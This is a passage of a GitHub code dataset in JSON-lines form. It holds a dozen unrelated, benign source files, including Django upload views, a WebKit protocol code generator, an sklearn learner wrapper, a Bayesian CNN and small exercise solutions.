if buffer is None:\n buffer = StringIO()\n\n for line in self.code:\n\n if isinstance(line, Newline):\n buffer.write(\"\\n\")\n newline = True\n\n elif isinstance(line, Indent):\n level += 1\n\n elif isinstance(line, Dedent):\n level -= 1\n\n elif isinstance(line, str):\n if line != '':\n if newline:\n buffer.write(level * self.tab + line)\n newline = False\n else:\n buffer.write(line)\n\n elif isinstance(line, CodeBlock):\n line.flatten(level, buffer, newline)\n\n return 
buffer.getvalue()\n\n def eq_locations(self, loc1, loc2):\n return loc1[0] == loc2[0] and loc1[2] == loc2[2]\n\n def gen_mapping(self, mapper, pylineno=1, last_locations=None):\n for line in self.code:\n if isinstance(line, Newline):\n pylineno += 1\n if line.locations and (last_locations is None or not self.eq_locations(last_locations, line.locations)):\n mapper.add(line.locations, pylineno)\n last_locations = line.locations\n elif isinstance(line, CodeBlock):\n pylineno = line.gen_mapping(mapper, pylineno, last_locations)\n return pylineno\n\n def isEmpty(self):\n return True if self.code == [] else False\n\n\nif __name__ == \"__main__\":\n\n cb = CodeBlock(tab=\"°\")\n cb2 = CodeBlock(tab=\"°\")\n\n cb.newline(\"def toto():\")\n cb.indent()\n cb.add(cb2)\n cb.dedent()\n\n cb2.newline(\"C1 = 0\")\n cb2.newline(\"C2 = 1\")\n cb2.newline()\n cb2.write(\"C3 = \")\n cb2.write(\"2\")\n cb2.newline()\n cb2.write(\"def hello():\")\n cb2.indent()\n cb2.newline(\"pass\")\n cb2.dedent()\n\n print(cb.flatten())\n","repo_name":"azizlahmedi/iadev3.0","sub_path":"venv/lib/python3.11/site-packages/delia_codegen/codeblock.py","file_name":"codeblock.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29522457356","text":"from lordoftheringssdk.api_methods import ApiMethods\n\nclass Quote(ApiMethods):\n \"\"\"Class representing a quote from a Lord of the Rings movie\"\"\"\n\n def __init__(\n self, _id: str, dialog: str, movie_id: str, character_id: str, id: str\n ):\n \"\"\"\n Initializes a Quote object with relevant attributes\n\n :param _id: quote's unique identifier\n :param dialog: the contents of the quote\n :param movie_id: identifier for the movie the quote is from\n :param character_id: identifier for which character says the quote\n :param id: redundant quote identifier\n \"\"\"\n self._id = _id\n self.dialog = dialog\n self._movie_id = movie_id\n self._character_id = character_id\n self.id = id\n self.name = dialog\n\n @property\n def movie(self):\n from .movie import Movie\n return Movie.get(self._movie_id)[0]\n","repo_name":"Dbuffet/LORD-SDK","sub_path":"lordoftheringssdk/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18332695051","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\nalp_to_num = {chr(i+97): i for i in range(26)}\nALP_to_num = {chr(i+97).upper(): i for i in range(26)}\nnum_to_alp = {i: chr(i+97) for i in range(26)}\nnum_to_ALP = {i: chr(i+97).upper() for i in range(26)}\n\ndef make_grid(h, w, num): return [[int(num)] * w for _ in range(h)]\n\n\ndef main():\n Q = NI()\n querys = [list(SI().split()) for _ in range(Q)]\n D = deque()\n for q in querys:\n if q[0] == \"1\":\n D.append([q[1], int(q[2])])\n continue\n\n cut = [0]*26\n d = int(q[1])\n while d > 0 and D:\n L = D.popleft()\n if d >= L[1]:\n cut[alp_to_num[L[0]]] += L[1]\n d -= L[1]\n else:\n cut[alp_to_num[L[0]]] += d\n D.appendleft([L[0], L[1] - d])\n d = 0\n ans = 0\n for c in cut:\n ans += c**2\n print(ans)\n\n\n\n\nif __name__ == \"__main__\":\n 
main()","repo_name":"Mao-beta/AtCoder","sub_path":"PAST/PAST02G.py","file_name":"PAST02G.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27178068633","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Max\n\nfrom flow.models import Node\nfrom .forms import DrawingForm\nfrom .models import DrawingNode, DrawingNodeFlowRel\n\n\n# Create your views here.\n@login_required\ndef ajax_upload_drawing(request, node_id):\n ret = {'code': 'fail'}\n try:\n node = Node.objects.get(pk=node_id)\n except Node.DoesNotExist:\n ret['msg'] = \"node cant find\"\n return JsonResponse(ret)\n if request.method == \"POST\":\n drawing = DrawingForm(request.POST, request.FILES)\n print(request.FILES.get('location'))\n print(request.POST)\n if drawing.is_valid():\n drawing = drawing.save(commit=False)\n id_name = drawing.location.name.split('/')[-1].split('_')[0]\n dn, created = DrawingNode.objects.get_or_create(name=id_name)\n if created:\n dn.author = request.user\n DrawingNodeFlowRel.objects.create(\n flow=node.flow, drawing_node=dn)\n dn.save()\n drawing.drawing_node = dn\n drawing.author = request.user\n qs = drawing.drawing_node.drawing_set.aggregate(Max('order'))\n drawing.order = (qs['order__max'] or 0) + 1\n drawing.save()\n ret['code'] = 'success'\n return JsonResponse(ret)\n else:\n print(drawing.errors)\n ret['msg'] = \"form not validate\"\n else:\n ret['msg'] = 'invalid request method'\n return JsonResponse(ret)\n","repo_name":"NullOnSpace/ReynoldsFlow","sub_path":"drawing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22877140702","text":"# -*- coding: utf-8 -*-\n\"\"\"bigas URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom __future__ import unicode_literals\nfrom django.conf.urls import url\nfrom django.contrib import admin\n\nfrom .views import HomePageView, FormHorizontalView, FormInlineView, PaginationView, FormWithFilesView, \\\n    DefaultFormView, MiscView, DefaultFormsetView, DefaultFormByFieldView\n\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    url(r'^$', HomePageView.as_view(), name='home'),\n    url(r'^formset$', DefaultFormsetView.as_view(), name='formset_default'),\n    url(r'^form$', DefaultFormView.as_view(), name='form_default'),\n    url(r'^form_by_field$', DefaultFormByFieldView.as_view(), name='form_by_field'),\n    url(r'^form_horizontal$', FormHorizontalView.as_view(), name='form_horizontal'),\n    url(r'^form_inline$', FormInlineView.as_view(), name='form_inline'),\n    url(r'^form_with_files$', FormWithFilesView.as_view(), name='form_with_files'),\n    url(r'^pagination$', PaginationView.as_view(), name='pagination'),\n    url(r'^misc$', MiscView.as_view(), name='misc'),\n]\n","repo_name":"danielrcardenas/assigment_rooms","sub_path":"bigas/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20642818629","text":"#coding=utf-8\n\nimport hashlib\n\n\n\ndef generateMD5(text):\n    # create an md5 object\n    hl = hashlib.md5()\n\n    # Tips\n    # encode must be declared here,\n    # otherwise it raises: hl.update(str)  Unicode-objects must be encoded before hashing\n    hl.update(text.encode(encoding='utf-8'))\n    strmd5=hl.hexdigest()\n    print('Before MD5 hashing: ' + text)\n    print('After MD5 hashing: ' + strmd5)\n\n    return strmd5\n\nif __name__==\"__main__\":\n    generateMD5(\"\")","repo_name":"zhuzhilin3/test","sub_path":"ET_test/commons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7204151443","text":"import ipywidgets as widgets\nfrom ipywidgets import Layout\n\nfrom ..._version import VERSION\nfrom .core import IPyDisplayMixin, RegisteredWidget\n\n__version__ = VERSION\n__author__ = \"Ian Hellen\"\n\n\nclass GetText(RegisteredWidget, IPyDisplayMixin):\n    \"\"\"\n    GetText.\n\n    Prompts the user to enter a text value. 
The value\n    can be edited in the text box and read back via the value property.\n    \"\"\"\n\n    def __init__(\n        self,\n        default: str = None,\n        description: str = \"Enter the value: \",\n        auto_display: bool = False,\n        **kwargs,\n    ):\n        \"\"\"\n        Create a new instance of GetText.\n\n        Parameters\n        ----------\n        default : str\n            Default value.\n        description : str, optional\n            Prompt to display with the text box.\n            (the default is \"Enter the value: \")\n            \"prompt\" is an alias for this parameter\n        auto_display : bool, optional\n            Whether to display on instantiation (the default is False)\n\n        See Also\n        --------\n        RegisteredWidget\n\n        \"\"\"\n        self._value = default\n        description = kwargs.pop(\"prompt\", description)\n\n        # Call superclass to register\n        super().__init__(id_vals=[default, description], val_attrs=[\"_value\"], **kwargs)\n\n        self._w_text = widgets.Text(\n            value=self._value,\n            description=description,\n            layout=Layout(width=\"50%\"),\n            style={\"description_width\": \"initial\"},\n        )\n\n        self._w_text.observe(self._update_value, names=\"value\")\n        if auto_display:\n            self.display()\n\n    def _update_value(self, change):\n        self._value = change.get(\"new\", \"\")\n\n    @property\n    def layout(self):\n        \"\"\"Return underlying widget collection.\"\"\"\n        return self._w_text\n\n    @property\n    def value(self):\n        \"\"\"Get the current text value.\"\"\"\n        return self._value.strip() if self._value else None\n\n    def display(self):\n        \"\"\"Display the interactive widgets.\"\"\"\n        if self._value:\n            self._w_text.value = self._value\n        super().display()\n","repo_name":"pianomanx/msticpy","sub_path":"msticpy/nbtools/nbwidgets/get_text.py","file_name":"get_text.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"11101256822","text":"import retro\nimport cv2\nimport numpy as np\nimport pickle\nimport neat\n\nenv = retro.make(game=\"MortalKombat3-Genesis\", state=\"sub-zero-hard1\", record='.')\n# env = retro.make(game=\"MortalKombat3-Genesis\")\n\nw = pickle.load(open(\"sub-zero-winner6.bin\", \"rb\"))\nob = env.reset()\ninx, iny, inc = env.observation_space.shape\ninx = int(inx/8)\niny = int(iny/8)\nimageArray = []\nframe = 0\ndone = False\nconfig = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n                     neat.DefaultSpeciesSet, neat.DefaultStagnation,\n                     'config-neat')\nnet = neat.nn.recurrent.RecurrentNetwork.create(w,config)\nwhile not done:\n    if (frame >= 5):\n        # env.render()\n        frame = 0\n    frame += 1\n    ob = cv2.resize(ob, (inx, iny))\n    ob = cv2.cvtColor(ob, cv2.COLOR_BGR2GRAY)\n    ob = np.reshape(ob, (inx, iny))\n\n    # for x in ob:\n    #     for y in x:\n    #         imageArray.append(y)\n    imageArray = ob.flatten()\n    nnOut = net.activate(imageArray)\n\n    ob, reward, done, info = env.step(nnOut)\n","repo_name":"Veljko97/ORI-2019-NEAT-MortalKombat3","sub_path":"playGame/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11207667676","text":"import logging\nimport string\nfrom string import Template\n\ntry:\n    from .cpp_generator import CppGenerator\n    from .cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n    from .generator import Generator, ucfirst\n    from .models import ObjectType, ArrayType, AliasedType, EnumType\nexcept:\n    from cpp_generator import CppGenerator\n    from cpp_generator_templates import CppGeneratorTemplates as CppTemplates\n    from generator import Generator, 
ucfirst\n from models import ObjectType, ArrayType, AliasedType, EnumType\n\nlog = logging.getLogger('global')\n\n\nclass CppFrontendDispatcherImplementationGenerator(CppGenerator):\n def __init__(self, *args, **kwargs):\n CppGenerator.__init__(self, *args, **kwargs)\n\n def output_filename(self):\n return \"%sFrontendDispatchers.cpp\" % self.protocol_name()\n\n def domains_to_generate(self):\n return [domain for domain in Generator.domains_to_generate(self) if len(self.events_for_domain(domain)) > 0]\n\n def generate_output(self):\n header_args = {\n 'primaryInclude': '\"%sFrontendDispatchers.h\"' % self.protocol_name(),\n 'secondaryIncludes': self._generate_secondary_header_includes(),\n }\n\n sections = []\n sections.append(self.generate_license())\n sections.append(Template(CppTemplates.ImplementationPrelude).substitute(None, **header_args))\n sections.extend(list(map(self._generate_dispatcher_implementations_for_domain, self.domains_to_generate())))\n sections.append(Template(CppTemplates.ImplementationPostlude).substitute(None, **header_args))\n return \"\\n\\n\".join(sections)\n\n # Private methods.\n\n def _generate_secondary_header_includes(self):\n header_includes = [\n ([\"JavaScriptCore\", \"WebKit\"], (\"JavaScriptCore\", \"inspector/InspectorFrontendRouter.h\")),\n ]\n return '\\n'.join(self.generate_includes_from_entries(header_includes))\n\n def _generate_dispatcher_implementations_for_domain(self, domain):\n implementations = []\n events = self.events_for_domain(domain)\n for event in events:\n implementations.append(self._generate_dispatcher_implementation_for_event(event, domain))\n\n return self.wrap_with_guard_for_condition(domain.condition, '\\n\\n'.join(implementations))\n\n def _generate_dispatcher_implementation_for_event(self, event, domain):\n lines = []\n parameter_assignments = []\n formal_parameters = []\n\n for parameter in event.event_parameters:\n parameter_name = parameter.parameter_name\n if parameter.is_optional:\n parameter_name = 'opt_' + parameter_name\n\n parameter_value = parameter_name\n\n _type = parameter.type\n if isinstance(_type, AliasedType):\n _type = _type.aliased_type\n if isinstance(_type, EnumType) and _type.is_anonymous:\n _type = _type.primitive_type\n\n if _type.is_enum():\n if parameter.is_optional:\n parameter_value = '*' + parameter_value\n parameter_value = 'Protocol::%s::getEnumConstantValue(%s)' % (self.helpers_namespace(), parameter_value)\n elif CppGenerator.should_release_argument(_type, parameter.is_optional):\n parameter_value = parameter_value + '.releaseNonNull()'\n elif CppGenerator.should_dereference_argument(_type, parameter.is_optional):\n parameter_value = '*' + parameter_value\n elif CppGenerator.should_move_argument(_type, parameter.is_optional):\n parameter_value = 'WTFMove(%s)' % parameter_value\n\n parameter_args = {\n 'parameterKey': parameter.parameter_name,\n 'parameterName': parameter_name,\n 'parameterValue': parameter_value,\n 'keyedSetMethod': CppGenerator.cpp_setter_method_for_type(_type),\n }\n\n if parameter.is_optional:\n parameter_assignments.append(' if (!!%(parameterName)s)' % parameter_args)\n parameter_assignments.append(' protocol_paramsObject->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % parameter_args)\n else:\n parameter_assignments.append(' protocol_paramsObject->%(keyedSetMethod)s(\"%(parameterKey)s\"_s, %(parameterValue)s);' % parameter_args)\n\n formal_parameters.append('%s %s' % (CppGenerator.cpp_type_for_event_parameter(_type, parameter.is_optional), 
parameter_name))\n\n event_args = {\n 'domainName': domain.domain_name,\n 'eventName': event.event_name,\n 'formalParameters': \", \".join(formal_parameters)\n }\n\n lines.append('void %(domainName)sFrontendDispatcher::%(eventName)s(%(formalParameters)s)' % event_args)\n lines.append('{')\n lines.append(' auto protocol_jsonMessage = JSON::Object::create();')\n lines.append(' protocol_jsonMessage->setString(\"method\"_s, \"%(domainName)s.%(eventName)s\"_s);' % event_args)\n\n if len(parameter_assignments) > 0:\n lines.append(' auto protocol_paramsObject = JSON::Object::create();')\n lines.extend(parameter_assignments)\n lines.append(' protocol_jsonMessage->setObject(\"params\"_s, WTFMove(protocol_paramsObject));')\n\n lines.append('')\n lines.append(' m_frontendRouter.sendEvent(protocol_jsonMessage->toJSONString());')\n lines.append('}')\n return self.wrap_with_guard_for_condition(event.condition, \"\\n\".join(lines))\n","repo_name":"WebKit/WebKit","sub_path":"Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_frontend_dispatcher_implementation.py","file_name":"generate_cpp_frontend_dispatcher_implementation.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"} +{"seq_id":"22379541729","text":"# Katie Li\n# 06/09/2015\n# example use: python3 simple_analysis.py data.csv Testing Time\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom textwrap import wrap\nimport sys\n\nfilename = input(\"data file to read from:\" ) \nDEFAULT_HEADER =60\ndf = pd.read_csv(filename, header=DEFAULT_HEADER, delim_whitespace=False)\n\nf = lambda u: int(str(u)[4:-2]) \nf2 = lambda u: int(str(u)[:-4])\ndf['month'] = df['Date'].map(f) \ndf['year'] = df['Date'].map(f2) \ndf['copy_month'] = df['month']\ndf['copy_year'] = df['year']\n## get rid of missing data for specified variable\n\ndef analyzeOneVariable(df, timeFrame, variable):\n df2 = df[['Date', variable,timeFrame, 'copy_' + timeFrame]].dropna()\n df2 = df2.groupby(timeFrame).mean()\n df2['std_'+ variable] = df2[variable].std() \n df2[variable+ \"_Ustd\"] = df2[variable] + df2['std_'+ variable] \n df2[variable+ \"_Dstd\"] = df2[variable] - df2['std_'+ variable] \n return df2\n\n## create simple, minimalistic plot\ndef createPlot(timeFrame, plotTitle, variable, units, df2):\n plt.cla()\n plt.title(\"\\n\".join(wrap(\" Mean for each \" + timeFrame + \" , \"+ plotTitle + \\\n \" 1989 - 2015, Pomona California\", 50)))\n plt.xlabel('Time '+ timeFrame, fontsize=12, color='black')\n plt.ylabel(plotTitle+ \" \" + units, fontsize = 12, color='black')\n plt.plot(df2['copy_' + timeFrame], df2[variable], color=\"#078ccc\", marker='o')\n plt.plot(df2['copy_' + timeFrame], df2[variable +\"_Ustd\"], color=\"#000000\")\n plt.plot(df2['copy_' + timeFrame], df2[variable + \"_Dstd\"], color=\"#000000\")\n print(df2[[str('copy_'+ timeFrame),variable]])\n print(df2.index)\n plt.savefig('graphs/'+ plotTitle+ timeFrame + \".png\")\n plt.cla()\n\nif __name__ == '__main__': \n df2 = analyzeOneVariable(df, \"month\", \"Precip\")\n createPlot(\"month\", \"Precipitation\", \"Precip\", \"\", df2) \n df2.to_csv(\"csv/MonthlyPrecip.csv\", encoding='utf-8')\n\n df2 = analyzeOneVariable(df, \"year\", \"Precip\")\n createPlot(\"year\", \"Precipitation\", \"Precip\", \"(inches)\", df2) \n df2.to_csv(\"csv/YearlyPrecip.csv\", encoding='utf-8')\n\n df2 = analyzeOneVariable(df, \"year\", \"Air_max\")\n createPlot(\"year\", \"Maximum temperature\", \"Air_max\", \"(F)\", 
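analyzeOneVariable in the record above takes per-month (or per-year) means and then attaches a standard deviation, but note that df2[variable].std() is computed over the group means after the groupby, so the Ustd/Dstd bands are a single scalar offset rather than the within-group spread. If per-group spread is wanted, groupby can aggregate both at once; a sketch with a hypothetical frame:

import pandas as pd

df = pd.DataFrame({'month': [1, 1, 2, 2], 'Precip': [0.1, 0.3, 1.0, 2.0]})

g = df.groupby('month')['Precip']
out = g.agg(mean='mean', std='std')   # per-group std, not a scalar
out['Ustd'] = out['mean'] + out['std']
out['Dstd'] = out['mean'] - out['std']
print(out)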
df2) \n df2.to_csv(\"csv/MaxYearlyTemp.csv\", encoding='utf-8')\n\n df2 = analyzeOneVariable(df, \"month\", \"Air_max\")\n createPlot(\"month\", \"Maximum temperature\", \"Air_max\", \"(F)\", df2) \n df2.to_csv(\"csv/MaxMonthlyTemp.csv\", encoding='utf-8')\n\n\n\n print(\"Done\")\n","repo_name":"ksl0/BMP","sub_path":"simple_analysis.py","file_name":"simple_analysis.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14290808655","text":"from os import path\n\nfrom golem.environments.minperformancemultiplier import MinPerformanceMultiplier\nfrom golem.testutils import DatabaseFixture\n\nfrom golem.environments.environment import Environment\nfrom golem.model import Performance\nfrom golem.testutils import PEP8MixIn\n\n\nclass EnvTest(DatabaseFixture, PEP8MixIn):\n PEP8_FILES = [\"golem/environments/environment.py\"]\n\n def setUp(self):\n super().setUp()\n self.env = Environment()\n\n def test_get_performance(self):\n # given\n perf_value = 6666.6\n perf = Performance(environment_id=Environment.get_id(),\n value=perf_value)\n perf.save()\n\n # then\n self.assertEqual(self.env.get_performance(), perf_value)\n\n def test_get_source_code(self):\n # check defaults\n assert self.env.get_source_code() is None\n\n # given\n file_name = path.join(self.path, \"mainprogramfile\")\n self.env.main_program_file = file_name\n\n # then\n assert self.env.get_source_code() is None\n\n # re-given\n with open(file_name, 'w') as f:\n f.write(\"PROGRAM CODE\")\n\n # then\n self.env.main_program_file = file_name\n assert self.env.get_source_code() == \"PROGRAM CODE\"\n\n def test_check_software(self):\n # check defaults\n assert not self.env.check_software()\n self.env.allow_custom_main_program_file = True\n assert self.env.check_software()\n\n # given\n self.env.allow_custom_main_program_file = False\n file_name = path.join(self.path, \"mainprogramfile\")\n self.env.main_program_file = file_name\n\n with open(file_name, 'w') as f:\n f.write(\"PROGRAM CODE\")\n\n # then\n assert self.env.check_software()\n\n def test_run_default_benchmark(self):\n assert Environment.get_performance() == 0.0\n assert Environment.run_default_benchmark(save=True) > 0.0\n assert Environment.get_performance() > 0.0\n\n def test_get_min_accepted_performance_default(self):\n self.assertEqual(MinPerformanceMultiplier.get(), 0.0)\n self.assertEqual(self.env.get_min_accepted_performance(), 0.0)\n\n def test_get_min_accepted_performance(self):\n # given\n p = Performance(environment_id=Environment.get_id(),\n min_accepted_step=100)\n p.save()\n MinPerformanceMultiplier.set(3.141)\n\n # then\n self.assertEqual(MinPerformanceMultiplier.get(), 3.141)\n self.assertEqual(self.env.get_min_accepted_performance(), 314.1)\n","repo_name":"albert19882016/golem","sub_path":"tests/golem/environments/test_environment.py","file_name":"test_environment.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"12739886375","text":"import numpy as np\nimport logging\nfrom supervised.models.learner import Learner\nfrom sklearn.externals import joblib\nimport copy\n\nlogger = logging.getLogger(__name__)\n\n\nclass SklearnLearner(Learner):\n def __init__(self, params):\n super(SklearnLearner, self).__init__(params)\n\n def fit(self, X, y):\n self.model.fit(X, y)\n\n def copy(self):\n return copy.deepcopy(self)\n\n def save(self):\n joblib.dump(self.model, 
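SklearnLearner above persists its estimator with joblib and mirrors the path in a JSON description on save()/load(). The record imports joblib from sklearn.externals, which newer scikit-learn releases removed; the standalone joblib package provides the same dump/load API. A minimal round-trip, with a hypothetical file name:

import joblib
from sklearn.linear_model import LogisticRegression

model = LogisticRegression().fit([[0.0], [1.0]], [0, 1])
joblib.dump(model, 'learner.joblib', compress=True)  # same call shape as save()
restored = joblib.load('learner.joblib')
print(restored.predict([[0.2]]))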
self.model_file_path, compress=True)\n\n json_desc = {\n \"library_version\": self.library_version,\n \"algorithm_name\": self.algorithm_name,\n \"algorithm_short_name\": self.algorithm_short_name,\n \"uid\": self.uid,\n \"model_file\": self.model_file,\n \"model_file_path\": self.model_file_path,\n \"params\": self.params,\n }\n\n logger.debug(\"SklearnLearner save to {0}\".format(self.model_file_path))\n return json_desc\n\n def load(self, json_desc):\n self.library_version = json_desc.get(\"library_version\", self.library_version)\n self.algorithm_name = json_desc.get(\"algorithm_name\", self.algorithm_name)\n self.algorithm_short_name = json_desc.get(\n \"algorithm_short_name\", self.algorithm_short_name\n )\n self.uid = json_desc.get(\"uid\", self.uid)\n self.model_file = json_desc.get(\"model_file\", self.model_file)\n self.model_file_path = json_desc.get(\"model_file_path\", self.model_file_path)\n self.params = json_desc.get(\"params\", self.params)\n\n self.model = joblib.load(self.model_file_path)\n\n logger.debug(\n \"SklearnLearner loading model from {0}\".format(self.model_file_path)\n )\n\n\nclass SklearnTreesClassifierLearner(SklearnLearner):\n def __init__(self, params):\n super(SklearnTreesClassifierLearner, self).__init__(params)\n\n def fit(self, X, y):\n self.model.fit(X, np.ravel(y))\n self.model.n_estimators += self.trees_in_step\n\n def predict(self, X):\n return self.model.predict_proba(X)[:, 1]\n","repo_name":"sarikayamehmet/mljar-supervised","sub_path":"supervised/models/learner_sklearn.py","file_name":"learner_sklearn.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"2024077620","text":"# -*- coding: utf-8 -*-\n\"\"\"BayesianConv5Dense1 definition. Sigmoid and softplus instead of tanh for positive output. 
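SklearnTreesClassifierLearner above bumps n_estimators after every fit(), a pattern that only grows the ensemble incrementally when the underlying forest was built with warm_start=True (otherwise each fit retrains from scratch). A self-contained sketch of that incremental behavior:

import numpy as np
from sklearn.ensemble import RandomForestClassifier

X = np.random.rand(100, 4)
y = np.random.randint(0, 2, 100)

# warm_start keeps already-fitted trees; raising n_estimators then fits
# only the new ones on the next call.
clf = RandomForestClassifier(n_estimators=10, warm_start=True)
clf.fit(X, y)
clf.n_estimators += 10
clf.fit(X, y)
print(len(clf.estimators_))  # 20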
No dropout.\"\"\"\n\nimport torch.nn as nn\n\nfrom utils.layers import BayesianConv2d, BayesianLinear, Flatten\nfrom models.abstract_model import AbstractModel\n\n\nclass BayesianConv5Dense1(AbstractModel):\n\n def __init__(self, input_size):\n \"\"\"\n Parameters\n ----------\n input_size : (int, int, int)\n Input size.\n \"\"\"\n super(BayesianConv5Dense1, self).__init__(input_size)\n \n self.layers = nn.ModuleList([\n BayesianConv2d(input_size[0], 10, kernel_size=(10, 1), padding=(5, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 10, kernel_size=(10, 1), padding=(4, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 10, kernel_size=(10, 1), padding=(5, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 10, kernel_size=(10, 1), padding=(4, 0)),\n nn.Sigmoid(),\n BayesianConv2d(10, 1, kernel_size=(3, 1), padding=(1, 0)),\n nn.Softplus(),\n Flatten(1 * input_size[1] * input_size[2]),\n BayesianLinear(1 * input_size[1] * input_size[2], 100),\n nn.Softplus(),\n BayesianLinear(100, 1),\n nn.Softplus()\n ])\n","repo_name":"kkangshen/bayesian-deep-rul","sub_path":"models/bayesian_conv5_dense1.py","file_name":"bayesian_conv5_dense1.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"} +{"seq_id":"40425180765","text":"fname = input('Enter the file name: ')\ntry:\n fhand = open(fname)\nexcept:\n print('File cannot be opened:', fname)\n exit()\n\nsum = 0\ncount = 0\n\nfor line in fhand:\n line = line.rstrip()\n if line.find(\"X-DSPAM-Confidence\") == -1: continue\n curr_coef = float(line[line.find(':')+1:])\n sum = sum+curr_coef\n count = count + 1\n\nprint(\"Average spam confidence is: \",sum/count)\n","repo_name":"CristianColdea/P4E","sub_path":"chapter7/ex72.py","file_name":"ex72.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12578182331","text":"# https://leetcode.com/problems/populating-next-right-pointers-in-each-node\n# 92 ms\n\n# Definition for binary tree with next pointer.\n# class TreeLinkNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n# self.next = None\n\nclass Solution:\n # @param root, a tree link node\n # @return nothing\n def connect(self, root):\n leftMost = root\n\n while leftMost:\n current = leftMost\n bridgeLeft = None\n\n while current:\n if current.left and current.right:\n current.left.next = current.right\n\n bridgeLeft = (current.right or current.left) or bridgeLeft\n current = current.next\n\n if current:\n bridgeRight = current.left or current.right\n\n if bridgeLeft and bridgeRight:\n bridgeLeft.next = bridgeRight\n\n current = leftMost\n leftMost = leftMost.left or leftMost.right\n\n while not leftMost and current:\n current = current.next\n\n if current:\n leftMost = current.left or current.right\n\n","repo_name":"diegomontoyas/Algorithms","sub_path":"LeetCode/populating-next-right-pointers-in-each-node.py","file_name":"populating-next-right-pointers-in-each-node.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25904751842","text":"import sys\r\nimport matplotlib.pyplot as plt\r\nfrom pandas import *\r\n\r\n# Define the data for the chart\r\ndata = read_csv(\"C:\\\\Users\\\\Slim5\\\\Downloads\\\\Hostel.csv\")\r\nc=float(sys.argv[1])\r\nfig, ax = plt.subplots(figsize=(3, 6))\r\nax.bar('Summary', c)\r\n\r\n# Set y-axis scale to 1 
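The populating-next-right-pointers solution above threads next pointers level by level in O(1) extra space; bridgeLeft/bridgeRight stitch across parents whose children are missing, which is what makes it work on arbitrary binary trees. For the perfect-tree version of the problem, the walk collapses to a few lines; a sketch using the same TreeLinkNode fields:

def connect_perfect(root):
    # root tracks the leftmost node of the current level
    while root and root.left:
        node = root
        while node:
            node.left.next = node.right  # link siblings under one parent
            # bridge to the next parent's left child, if any
            node.right.next = node.next.left if node.next else None
            node = node.next
        root = root.left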
